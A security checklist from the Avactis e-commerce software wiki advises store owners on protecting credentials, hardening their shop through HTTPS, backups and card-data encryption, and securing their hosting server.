Security checklist

From AVACTIS : Ecommerce Shopping Cart Software Wiki
Jump to: navigation, search

Nowadays hackers use many different types of sophisticated attacks on web servers and web applications.

Security is crucial for e-commerce and in this post we tried to accumulate security tips and recommendations which can help you make your store and server more secure and hacker-proof.

I. General Security of Your Computer and Access Information

Your store can be hacked even if your server and web software are absolutely secure.

How is that possible? Hackers can simply steal FTP access information from your local computer using a hidden trojan program! The trojan can detect your access information in RAM, memory of your browser or e-mail client program, or even key presses, and send it to the hackers' database.

Then the hackers' automatic software will visit all the hacked sites using the FTP access info and modify files with the most common file names (e.g. index.php, admin.php, config.php, db*.php etc), or even all available files, and add malicious code to them. For example, it can be spam links or IFRAMEs loading pages from hackers' websites, dangerous shell code, etc.

How to protect your local computer and access information?

  • Make sure your computer is malware-free

Scan your local computer using up-to-date anti-malware programs. Make sure your computer and computers of your developers or employers are protected with the latest anti-virus software. You can use commercial or free software, for example the free Microsoft Security Essentials. Note that not every anti-virus program detects IFRAME malware. One of the best anti-malware scanners is PrevX.

  • Never store access information in plain text

If you save your passwords to text files, they can easily be read by malware. Use specially-designed password storage software. A good example is the cross-platform open-souce KeePass.

  • Never send access information in plain text

Hackers use special sniffer programs to monitor network traffic and catch access information. So, even if your computer is 100% secure, and your server is 110% secure, your FTP login/password can be caught in between! It is highly recommended to transfer access information only over secure connections:

  • HTTPS for web forms (like the support form on our site)
  • HTTPS for web mail ( Gmail has a setting for always using HTTPS)
  • Secure POP and SMTP if you're using a standalone mail program (Outlook and Thunderbird 3 connect through SSL by default)
  • FTPS for file transfer (a great SFTP client for Windows is WinSCP) etc

Before connecting or sending a password somewhere, think what a connection it would be and find a way to switch to the secure one.

  • Change access information regularly

It is recommended to change access information at least several times a year. Even if hackers manage to steal your password, they won't be able to use it.

  • Use strong passwords for FTP, SSH and control panels

Hackers use the so called "brute force" attack. They use special automatic programs that can guess the password if it's simple. For example, if you use a password which consists of only digits, it means that hackers can guess the password within several minutes or an hour.

More information about password cracking methods (Please read it!)

It is highly recommended to use strong passwords which consist of numbers, letters and special symbols. The length of the password should be more than 8 symbols. Hackers can use special dictionaries with thousands of simple passwords, like "admin12345", "pass54321", "Yahoo1999", etc. So please don't use common words and numbers as your password.

You can test the strength of any password using this on-line tool from Microsoft Example of a strong password: h7X8_Cns-2RB_;*8q!v (It was generated by KeePass referenced above)

If you still prefer remembering passwords in your head, read these useful tips on how to create strong passwords that you can easily remember.

Here's another handful of tips straight from Microsoft: 4 steps to protect your computer

II. Security of Avactis Stores and Other Web Applications

Here are some recommendations and tips on how to make your store more secure. If you cannot do these steps yourself, don't hesitate to contact our support team for help.

  • 3rd party software

If you have several web applications on your server, e.g. forum, image gallery, blog, etc., make sure that you use the latest versions. Also make sure that the latest security patches are applied to these applications. Usually hackers use exploits/security holes in popular programs that allow them to execute system commands on your server. It is not recommended to make old software available for web access.

  • Encryption of credit card information

Avactis uses 2 types of encryption: RSA 1024 bit encryption algorithm and Blowfish encryption algorithm. In "Manual/Offline Credit Card Processing" module settings, you can generate a private key file. To see credit card data you will need to upload this private key file each time. So even if hackers steal your database and all files, they will not be able to steal credit card numbers anyway.

  • Check if the installation files has been removed

After the installation of Avactis has finished, the files install.dat and install.php are automatically deleted. Please verify that they have actually been deleted. If they have not, please manually delete the files to avoid accidental re-installation with overwriting your data.

  • Backup your store data on a regular basis

For data security purposes, it is highly recommended to perform backup at regular time intervals - once a day (optimal), a week, or a month, depending on the size of your data and on how often it is updated. It is also recommended to download backup files to your computer at regular time intervals to prevent loss of data in the event of server failure. In case a server failure occurs, you will be able to restore the on-line store from the backup files that were saved to your computer.

Avactis has an automatic backup system which can be configured as a Cron job (backups can be created regularly and automatically by your server). You can also use backup service from your hosting provider, but make sure it backs up databases too.

For more information please refer to our manual: Data Backup and Restore

  • SSL encryption

It is highly recommended to use the secure HTTPS protocol for checkout pages and login pages.

Avactis allows you to easily switch all or just the needed parts of the store front (Catalog, Shopping Cart, Checkout, File Download, Customer Account, Customer Authorization) to HTTPS. Same is for Admin area pages: whole Admin Area (Backend) or Sign-In & Admin Members Management, Orders & Customers, Payment & Shipping Modules Settings only.

You can configure it in Admin >> HTTPS settings window.

If an SSL certificate is not installed on your server, you should purchase it from a trusted authority and ask your hosting provider to configure the SSL certificate for you prior to setting it up in Avactis.

  • Protection of Admin Area with a .htaccess web password

You can additionally protect the avactis-system/admin/ directory using an .htaccess web password. More information about it is available in the Authorization tutorial on the official Apache web server site.

III. Security of Hosting Server Software

Security of your server is the job of your hosting provider (if your server is not dedicated and unmanaged).

The server security is not related to this post, as there is a ton of server settings and recommendations, here are just several tips:

  • Make sure your hosting uses a firewall and a good anti-virus program;
  • You can scan your site and hosting server using PCI DSS scanners, for example this Comodo company product

in order to find our some server side security issues;

  • You can disable remote script execution with these PHP settings: allow_url_fopen, allow_url_include;
  • You can ask your hosting provider to install the mod_security module for Apache;
  • If your server control panel is Parallels Plesk you can scan your website with Watchdog 2.0 tool for detection of rootkits and server security issues;